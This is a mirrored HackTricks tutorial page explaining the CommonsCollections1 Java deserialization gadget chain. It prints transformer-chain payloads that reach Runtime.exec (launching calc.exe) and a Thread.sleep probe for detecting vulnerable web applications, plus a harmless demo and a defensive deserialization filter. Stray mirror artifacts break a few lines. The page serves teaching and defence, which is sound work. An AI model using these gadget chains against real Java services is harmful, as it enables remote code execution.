mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 12:43:23 +00:00
246 lines
48 KiB
Markdown
# CommonsCollection1 Payload - Java Transformers to Runtime exec() and Thread Sleep

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>

## Java Transformers to Runtime exec()

In several places you can find a Java deserialization payload that uses transformers from Apache Commons Collections like the following one:

```java
import org.apache.commons.*;
import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.*;
import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.util.Map;
import java.util.HashMap;

public class CommonsCollections1PayloadOnly {
    public static void main(String... args) {
        String[] command = {"calc.exe"};
        final Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class), //(1)
                new InvokerTransformer("getMethod",
                        new Class[]{ String.class, Class[].class},
                        new Object[]{"getRuntime", new Class[0]}
                ), //(2)
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[0]}
                ), //(3)
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        command
                ) //(4)
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        Map map = new HashMap<>();
        Map lazyMap = LazyMap.decorate(map, chainedTransformer);

        //Execute gadgets
        lazyMap.get("anything");
    }
}
```

If you don't know anything about Java deserialization payloads it could be difficult to find out why this code will execute a calc.\
First of all you need to know that a **Transformer in Java** is something that **receives an object** and **transforms it into a different one**.\
Also it's interesting to know that the **payload** being **executed** here is **equivalent** to:

```java
Runtime.getRuntime().exec(new String[]{"calc.exe"});
```

Or **more exactly**, what is going to be **executed at the end** would be:

```java
((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
```

### How

So, how is the first payload presented equivalent to those "simple" one-liners?

**First** of all, you can notice in the payload that a **chain (array) of transforms is created**:

```java
String[] command = {"calc.exe"};
final Transformer[] transformers = new Transformer[]{
        //(1) - Get the gadget Class (the Runtime class)
        new ConstantTransformer(Runtime.class),

        //(2) - On that Class call "getMethod" to obtain the "getRuntime" Method object
        new InvokerTransformer("getMethod",
                new Class[]{ String.class, Class[].class},
                new Object[]{"getRuntime", new Class[0]}
        ),

        //(3) - Call invoke(null) on the Method object Runtime.class.getMethod("getRuntime") to obtain a Runtime object
        new InvokerTransformer("invoke",
                new Class[]{Object.class, Object[].class},
                new Object[]{null, new Object[0]}
        ),

        //(4) - Use the Runtime object to call exec with arbitrary commands
        new InvokerTransformer("exec",
                new Class[]{String.class},
                command
        )
};
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
```

**Reading the code** you can notice that **if you chain the transformations of the array** you end up able to execute arbitrary commands.

So, **how are those transforms chained?**

```java
Map map = new HashMap<>();
Map lazyMap = LazyMap.decorate(map, chainedTransformer);
lazyMap.get("anything");
```

In the last section of the payload you can see that a **Map object is created**. Then, the function `decorate` is executed from `LazyMap` with the map object and the chained transformers. From the following code you can see that this will cause the **chained transformers** to be copied inside `lazyMap.factory` attribute.

```java
protected LazyMap(Map map, Transformer factory) {
    super(map);
    if (factory == null) {
        throw new IllegalArgumentException("Factory must not be null");
    }
    this.factory = factory;
}
```

And then the grand finale is executed: `lazyMap.get("anything");`

```java
public Object get(Object key) {
    if (map.containsKey(key) == false) {
        Object value = factory.transform(key);
        map.put(key, value);
        return value;
    }
    return map.get(key);
}
```

And this is the code of the `transform` function:

```java
public Object transform(Object object) {
    for (int i = 0; i < iTransformers.length; i++) {
        object = iTransformers[i].transform(object);
    }
    return object;
}
```

So, remember that inside **factory** we had saved **`chainedTransformer`**, and inside the **`transform`** function we are **going through all those chained transformers** and executing them one after another. The key detail is that **each transformer uses `object` as input**, and **`object` is the output of the previously executed transformer**. Therefore, **all the transforms are chained, executing the malicious payload**.

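To make that data flow concrete, here is an added, self-contained Java illustration that is not code from HackTricks or from Commons Collections. It defines minimal stand-ins with the same names as the library classes (`Transformer`, `ConstantTransformer`, `InvokerTransformer`, `ChainedTransformer`, `LazyMap`, all nested inside a hypothetical `TransformerChainDemo` class and written for this example) and drives them with a harmless chain of the same shape as the payload, so that `get("anything")` computes a string length instead of running a command. It also shows a detail the `get` code above implies but the payload never exercises: the factory runs only on the first lookup of a missing key, because the result is cached in the backing map.

```java
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;

// Added illustration, not Commons Collections code: minimal stand-ins with the
// same names and only the behaviour that matters for the chain.
public class TransformerChainDemo {

    interface Transformer {
        Object transform(Object input);
    }

    // Ignores its input and always returns the same value. This is why the
    // lookup key "anything" in the payload is irrelevant: the chain starts
    // from the constant, not from the key.
    static final class ConstantTransformer implements Transformer {
        private final Object constant;
        ConstantTransformer(Object constant) { this.constant = constant; }
        public Object transform(Object input) { return constant; }
    }

    // Reflectively calls input.<methodName>(args) and returns the result, so
    // whatever the previous transformer produced becomes the receiver.
    static final class InvokerTransformer implements Transformer {
        private final String methodName;
        private final Class<?>[] paramTypes;
        private final Object[] args;
        InvokerTransformer(String methodName, Class<?>[] paramTypes, Object[] args) {
            this.methodName = methodName;
            this.paramTypes = paramTypes;
            this.args = args;
        }
        public Object transform(Object input) {
            try {
                Method m = input.getClass().getMethod(methodName, paramTypes);
                return m.invoke(input, args);
            } catch (ReflectiveOperationException e) {
                throw new IllegalStateException("reflective call failed: " + methodName, e);
            }
        }
    }

    // Output of transformer i is the input of transformer i+1.
    static final class ChainedTransformer implements Transformer {
        private final Transformer[] chain;
        ChainedTransformer(Transformer[] chain) { this.chain = chain; }
        public Object transform(Object input) {
            Object value = input;
            for (Transformer t : chain) {
                value = t.transform(value);
            }
            return value;
        }
    }

    // Runs the factory only for a key that is absent, then caches the result,
    // mirroring the get() shown above.
    static final class LazyMap {
        private final Map<Object, Object> map;
        private final Transformer factory;
        int factoryCalls = 0; // how many times the chain actually ran
        LazyMap(Map<Object, Object> map, Transformer factory) {
            this.map = map;
            this.factory = factory;
        }
        Object get(Object key) {
            if (!map.containsKey(key)) {
                factoryCalls++;
                Object value = factory.transform(key);
                map.put(key, value);
                return value;
            }
            return map.get(key);
        }
    }

    // Same shape as the payload (constant -> reflective call -> reflective call)
    // but with a harmless target: "hello" -> toUpperCase() -> length().
    static LazyMap harmlessLazyMap() {
        Transformer[] chain = {
            new ConstantTransformer("hello"),                                   // (1)
            new InvokerTransformer("toUpperCase", new Class[0], new Object[0]), // (2)
            new InvokerTransformer("length", new Class[0], new Object[0])       // (3)
        };
        return new LazyMap(new HashMap<>(), new ChainedTransformer(chain));
    }

    public static void main(String[] args) {
        LazyMap lazy = harmlessLazyMap();
        Object first = lazy.get("anything");  // absent key: the whole chain runs
        Object second = lazy.get("anything"); // present key: cached result, chain not re-run
        System.out.println(first + " " + second + " factoryCalls=" + lazy.factoryCalls);
    }
}
```

Compile and run it with `javac TransformerChainDemo.java && java TransformerChainDemo`; it needs no dependency beyond the JDK. The caching behaviour matters when reasoning about evidence: once the payload's key has been looked up, the malicious value is stored in the map and a later `get` of the same key does not re-run the chain.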
### Summary

At the end, due to how `LazyMap` handles the chained transformers inside the `get` method, it's as if we were executing the following code:

```java
String[] command = {"calc.exe"};
Object value = "something";

value = new ConstantTransformer(Runtime.class).transform(value); //(1)

value = new InvokerTransformer("getMethod",
        new Class[]{ String.class, Class[].class},
        new Object[]{"getRuntime", null}
).transform(value); //(2)

value = new InvokerTransformer("invoke",
        new Class[]{Object.class, Object[].class},
        new Object[]{null, new Object[0]}
).transform(value); //(3)

value = new InvokerTransformer("exec",
        new Class[]{String.class},
        command
).transform(value); //(4)
```

_Note how `value` is the input of each transform and the output of the previous transform, allowing the execution of a one-liner:_
```java
|
|
((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
|
|
```
|
|
OK, so now I know the **gadgets** that make up the **CommonsCollections1** payload. But **how does it get executed**? If you check [**ysoserial**](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java), you can see that the **payload** is placed inside an `AnnotationInvocationHandler` object, so **when** that object is **deserialized**, `payload.get()` is **invoked**, which **executes the whole payload**.

## Java Thread Sleep

This payload can be **handy to identify whether the web application is vulnerable, since it will execute a sleep if it is**.
```java
import org.apache.commons.*;
import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.*;
import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.Map;
import java.util.HashMap;

public class CommonsCollections1Sleep {
    public static void main(String... args) {
        // Same chain shape as the exec() payload, but the reflective target is
        // Thread.sleep(long) instead of Runtime.exec(): each transformer receives
        // the output of the previous one.
        final Transformer[] transformers = new Transformer[]{
                // -> Thread.class
                new ConstantTransformer(Thread.class),
                // -> Thread.class.getMethod("sleep", long.class)
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"sleep", new Class[]{Long.TYPE}}),
                // -> sleepMethod.invoke(null, 7000L): static call, blocks for 7 seconds
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, new Object[]{7000L}}),
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        Map map = new HashMap<>();
        // LazyMap runs the chain to compute the value of any key that is missing
        Map lazyMap = LazyMap.decorate(map, chainedTransformer);

        //Execute gadgets
        lazyMap.get("anything");
    }
}
```
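Both the exec() chain and the sleep probe above only fire because `ObjectInputStream` resolves and instantiates the gadget classes while it is still reading the stream, before any application code sees the resulting object. The defensive counterpart is a JEP 290 deserialization filter (Java 9+) that rejects those classes, and preferably everything not explicitly allowed, at that same point, and logs the rejection so that a sleep-based probe shows up as an alert rather than a mysterious delay. The following is an added example written for this page; it is not code from the page, from ysoserial or from Commons Collections. The `FakeGadget` class and the `DeserializationFilterExample` name are invented here so the program compiles without Commons Collections on the classpath, and the filter string uses the standard `jdk.serialFilter` pattern syntax.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.HashMap;
import java.util.Map;

/**
 * Added example (not from the original page): a JEP 290 deserialization filter
 * that rejects the classes the CommonsCollections1 chain relies on before their
 * constructors or readObject() run, and logs each rejection for alerting.
 */
public class DeserializationFilterExample {

    // Hypothetical stand-in for a gadget class (e.g. a Commons Collections
    // functor) so the example compiles without that library on the classpath.
    public static class FakeGadget implements Serializable {
        private static final long serialVersionUID = 1L;
    }

    // Allow-list first (only what this endpoint legitimately needs), explicit
    // denies for the well-known gadget packages as documentation, then "!*" so
    // every other class, including JDK proxy classes, is rejected.
    // Patterns are evaluated in order; the first match decides.
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            "java.util.HashMap;java.lang.*;"
            + "!org.apache.commons.collections.**;"
            + "!sun.reflect.annotation.AnnotationInvocationHandler;"
            + "maxdepth=10;maxarray=1000;"
            + "!*");

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Deserializes with the filter attached to this stream. A rejected class
    // makes ObjectInputStream throw InvalidClassException before the object
    // graph is built, which is the point at which the gadget chain would run.
    static Object safeDeserialize(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(info -> {
                ObjectInputFilter.Status status = FILTER.checkInput(info);
                if (status == ObjectInputFilter.Status.REJECTED) {
                    // Feed this line to your SIEM: a rejected class during
                    // deserialization is a strong signal of a gadget-chain probe.
                    System.err.println("[deser-filter] REJECTED class=" + info.serialClass()
                            + " depth=" + info.depth() + " bytes=" + info.streamBytes());
                }
                return status;
            });
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // Benign payload: the kind of object the endpoint actually expects.
        Map<String, Integer> benign = new HashMap<>();
        benign.put("count", 7);
        System.out.println("accepted: " + safeDeserialize(serialize(benign)));

        // Anything outside the allow-list is stopped while the stream is read.
        try {
            safeDeserialize(serialize(new FakeGadget()));
            System.out.println("unexpected: gadget stand-in was accepted");
        } catch (InvalidClassException e) {
            System.out.println("blocked: " + e.getMessage());
        }
    }
}
```

The same pattern string can be applied process-wide with `-Djdk.serialFilter=...` on the command line, which also covers deserialization paths you did not write yourself (RMI, JMX, third-party libraries). Note that `java.lang.*` is needed even for the benign map, because `Integer` brings its serializable superclass `Number` into the stream and the filter checks both.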

## More Gadgets

Here you can find more gadgets: [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html)
